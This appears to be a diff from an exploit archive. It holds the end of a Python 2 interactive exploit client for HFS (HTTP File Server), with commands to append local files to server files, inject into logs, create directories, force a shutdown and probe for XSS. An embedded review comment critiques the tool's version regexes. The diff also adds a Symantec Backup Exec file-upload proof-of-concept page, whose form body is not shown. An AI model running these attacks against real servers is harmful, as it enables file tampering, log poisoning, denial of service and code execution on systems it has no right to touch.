+ if cmd[1] != []:
+ globals()["host"] = cmd[1]
+ except:
+ print "No target info provided. Using localhost"
+
+def checkxss():
+ if ishostavailable():
+ curver = getservinfo('version','')
+ if curver != '':
+ return 'XSS Found'
+ else:
+ return 'Not Vulnerable'
+ else:
+ return msg_fail
+
+def isbanner(regex):
+ p = re.compile(regex)
+ m = p.match(banner)
+ return m
+
+def showacceptedcmds():
+ cmds = 'None (This server is not vulnerable)';
+ if isbanner(re_200801161):
+ cmds = 'checkxss symbols ver'
+ if isbanner(re_200801162):
+ cmds = cmds+' manipf mkd checkdos'
+ if isbanner(re_200801163):
+ cmds = cmds+' maniplog'
+ print '\nAvailable commands for this server:'
+ print ' '+cmds+'\n'
+
+def showver():
+ cangetver = True
+ if banner != '':
+ server_name = banner.split()
+ print banner
+ if server_name[0] != 'HFS':
+ print 'Not running HFS!'
+ cangetver = False
+ else:
+ if isbanner(re_cangetver):
+ print 'Confirming version...'
+ else:
+ cangetver = False
+ else:
+ print 'No version information found.'
+ print 'The "Send HFS identifier" option is probably disabled.'
+ print 'Trying to force HFS to display its version...'
+ if cangetver == True:
+ idver = getservinfo('version','HFS version number')
+ idbuild = getservinfo('build','HFS build number')
+ globals()["banner"] = 'HFS '+idver+' '+idbuild
+ showacceptedcmds()
+
+def result(s):
+ cmd = s.split()
+ if len(cmd) > 0:
+ curcmd = cmd[0]
+ result = 'Invalid command. Type "help" for list of commands.'
+ if curcmd == 'open':
+ procparams(cmd)
+ if ishostavailable():
+ showver()
+ result = 'Connected.\n'
+ else:
+ result = msg_fail
+ elif curcmd == 'symbols':
+ if ishostavailable():
+ showver()
+ print 'Forcing HFS to reveal more details...'
+ getallservinf()
+ result = msg_done
+ elif curcmd == 'ver':
+ if ishostavailable():
+ showver()
+ result = msg_done
+ elif curcmd == 'mkd':
+ if len(cmd) > 1:
+ if cmd[1] != []:
+ hfsmkdir(cmd[1])
+ result = msg_done
+ else:
+ result = msg_par_mis
+ elif curcmd == 'manipf':
+ if len(cmd) > 2:
+ try:
+ localfilecontent = readlocalfile(cmd[1])
+ except Exception, msg:
+ result = msg_acc_file,msg
+ else:
+ localfilecontent = localfilecontent.replace("\n","%0a")
+ hfsappendtofile(cmd[2],localfilecontent)
+ result = msg_done
+ else:
+ result = msg_par_mis
+ elif curcmd == 'maniplog':
+ if len(cmd) > 1:
+ try:
+ localfilecontent = readlocalfile(cmd[1])
+ except Exception, msg:
+ result = msg_acc_file,msg
+ else:
+ hfsinjecttolog(localfilecontent)
+ result = msg_done
+ else:
+ result = msg_par_mis
+ elif curcmd == 'checkdos':
+ shutdownhfs()
+ result = msg_done
+ elif curcmd == 'checkxss':
+ result = checkxss()
+ elif curcmd == 'help':
+ result = help
+ elif curcmd == 'readme':
+ result = readme
+ elif curcmd == 'quit':
+ result = 'Bye!'
+ return result
+ else:
+ return msg_help
+
+print about
+
+s = ""
+while s != "quit":
+ try: s = raw_input(">")
+ except EOFError:
+ s = "quit"
+ print s
+ print result(s)
+
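Review bot: The affected-version patterns `re_200801161`, `re_200801162`, `re_200801163` and `re_cangetver` use unescaped dots in plain string literals, so `2.2` or `2.[0-1]` accept any character in the middle (a constructed banner like `HFS 2x2` would match). `isbanner()` can therefore classify a server as affected when its banner does not say so. `showacceptedcmds()` prints that result as the server's status, so an administrator auditing their own host can get a false positive. Escape the dots and use raw strings, e.g. `re_200801162 = r'^HFS(.*?)(2\.2$|2\.2[a-b]|2\.3 beta)'`, and likewise for the other three. The lazy `(.*?)` after `HFS` probably also lets the version token match later in the banner than intended, which should be checked against real banner formats.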
diff --git a/platforms/windows/remote/31072.html b/platforms/windows/remote/31072.html
new file mode 100755
index 000000000..1700f0fac
--- /dev/null
+++ b/platforms/windows/remote/31072.html
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/27487/info
+
+Symantec Backup Exec System Recovery Manager is prone to a vulnerability that allows arbitrary unauthorized files to be uploaded to any location on the affected server.
+
+This issue resides in the Symantec LiveState Apache Tomcat server. Attackers can leverage it to execute arbitrary code with SYSTEM-level privileges and completely compromise affected computers.
+
+
+
+ File Upload POC
+
+
Backup Exec System Recovery Manager 7.0 File Upload POC
+
+(c)BastardLabs 2008.
+
+
\ No newline at end of file